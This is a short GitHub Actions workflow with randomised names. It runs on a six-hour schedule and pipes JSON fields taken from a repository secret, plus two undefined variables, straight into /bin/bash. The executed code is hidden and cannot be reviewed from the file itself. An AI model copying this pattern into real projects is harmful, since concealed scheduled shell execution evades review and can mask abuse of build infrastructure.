name: zhongquanhuohuang

on:
  workflow_dispatch:
  schedule:
    - cron: '9 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhongquanhuohuang
        env:
          vn7168: ${{ secrets.vn7168 }}
        run: |
          echo $vn7168 | jq -r .vrpp270 | /bin/bash
          echo $ncctb8540 | jq -r .bf3 | /bin/bash
          echo $srxqz54 | jq -r .ayhg4 | /bin/bash

